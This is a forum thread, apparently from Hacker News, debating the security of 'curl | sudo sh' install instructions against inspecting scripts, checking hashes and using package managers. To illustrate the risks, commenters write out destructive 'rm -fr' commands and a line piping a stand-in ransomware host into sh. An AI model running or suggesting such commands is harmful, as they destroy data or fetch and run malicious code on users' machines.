5 ms·
why is it still acceptable to suggest something like curl -sLfS https://cli.openfaas.com | sudo sh ?
by chipaca 6y ago
why is it still acceptable to suggest something like
curl -sLfS https://cli.openfaas.com | sudo sh
?
- gscho 6y agoCan you explain why this is so unacceptable? Couldn't you inspect the contents at the url before you executed the command? What I've seen in some cases is, run the curl command to download the file and then execute it. I don't see much difference. This is a serious question, not arguing that this is the best way.
- jlokier 6y agoYou answered the question yourself. The difference is between inspecting the executed command, and blindly executing something where you have no idea what it's going to do. For example, maybe the URL contents is "rm --no-preserve-root -fr /". Or "rm -fr /home/*/Pictures 2>/dev/null". Or "curl https://ransomeware-encryptor.example.com https://ransomeware-encryptor.example.com | sh". No problem if you inspect it first. Lots of unhappiness and heartbreak if you don't.
- oskapt 6y agoHas anyone ever in the history of complaining about this type of script run one and had it nuke their computer? What are the odds that the domains and companies and projects that use this have built their online presence just to pwn your computer for the lulz or that they have been compromised by a malicious actor without being detected at the same time you run the installer, and no one anywhere said anything? How about if instead we exercise critical thinking and make our own assessment of the risk and act accordingly? Why would you choose not to pipe a shell script from a site you don’t trust but execute their installer instead? If you don’t want to pipe it, download it and read it first.
- jlokier 6y agoHey, I use "curl | sh" myself. But I don't pretend there's no security risk in doing so. Like you advised, I exercise critical thinking, and then I take a risk. On someone else's production machine, or a container with sensitive data, that risk is too high. On a fun machine in isolation it's fine. The GPP asks what's the security difference between inspecting and not inspecting the downloaded command. > or that they have been compromised by a malicious actor without being detected at the same time you run the installer Installers are compromised quite often by malicious actors. Running an installer is just as dubious as running "curl | sh". However, replacing an installer with one that looks the same but is actually malicious, is a lot more work than replacing a blind script with one that looks the same but is actually malicious. And the risk of a malicious blind script going unnoticed is higher than a compromised installer when the SHA256 is shown to be checked alongside the latter's link, simply because the attacker would need to change two places instead of one. Yes I do check hashes of installers when that's possible and there isn't a package manager already doing so. It's a good idea anyway in case of a corrupted download file, which I do see from time to time.
- dheera 6y ago> had it nuke their computer? Pretty close. Some of them install all sorts of wacky dependencies through non-traditional means. Like you curl an install script and then it goes and curls a whole bunch of other stuff. Massive PITA to track all the changes that it made and uninstall it. Package managers were made for a reason, and people should use them.
- gscho 6y agoWhat would be cool is a command line util that you could pipe the script to for a safety inspection. Something like: curl https://ransomeware-encryptor.example.com https://ransomeware-encryptor.example.com | script-checker | sh
- OJFord 6y agoalias script-checker="echo 'echo unsafe'"
- jwalton 6y agoSince the shell script in question installs OpenFAAS, unless you read all the source code for OpenFAAS too, then really you still have no idea if it's going to do something malicious or not.
- folmar 6y agoA reasonable attacker would provide different file to curl and to the browser so you inspect something else then you run and don't even have a copy of the file.
- kissgyorgy 6y agoBecause it is probably too much work to correctly package the thing for multiple operating systems.
- pqb 6y agoGood question, I personally find gVisor-like [0] snippets that suggests to copy & paste in order to install the program as the most pleasant way: ( set -e URL=https://storage.googleapis.com/gvisor/releases/release/latest wget ${URL}/runsc ${URL}/runsc.sha512 sha512sum -c runsc.sha512 rm -f runsc.sha512 sudo mv runsc /usr/local/bin sudo chmod a+rx /usr/local/bin/runsc ) Thanks to the used parentheses it feels like a "one-liner" script. Is there any better way to share installation script? [0]: https://gvisor.dev/docs/user_guide/install/ https://gvisor.dev/docs/user_guide/install/
- dheera 6y agoYes, a .deb package. Much easier to UNinstall. That's the biggest problem with these install scripts, they give a crap across your entire system and it's not obvious how to get rid of it if you decide you don't want it.
- pqb 6y agoActually, deb is way how to "distribute" software not to "just" install something. Let's say I would like to install Docker I will need to type following commands in case of Ubuntu: ( sudo apt-get update sudo apt-get -y install \ apt-transport-https \ ca-certificates \ curl \ gnupg-agent \ software-properties-common curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add - sudo apt-key fingerprint 0EBFCD88 sudo add-apt-repository -y \ "deb [arch=amd64] https://download.docker.com/linux/ubuntu \ $(lsb_release -cs) \ stable" sudo apt-get update sudo apt-get install -y docker-ce docker-ce-cli containerd.io ) How would `.deb` help you to install/uninstall such software? Do mind mean embedding some scripts to add third-party repository and then install your app? Even then, what it actually changes from the script I have already suggested in previous post? It is still about downloading two files (signature and packaged application) and install it (e.g. via dpkg --install).
- dheera 6y agoWhy not just: sudo apt install docker.io And for more up-to-date versions, why doesn't Docker create a ppa? At most it should be something of the sort of: sudo apt-add-repository ppa:docker/docker sudo apt install docker That's how these things were intended to work.
- encom 6y agoIt never was acceptable in polite society, but I find it's a useful signal to indicate what software to avoid.
- alexellisuk 6y agoUpdated with two other options. These are documented in the existing link, but made clearer because of this comment.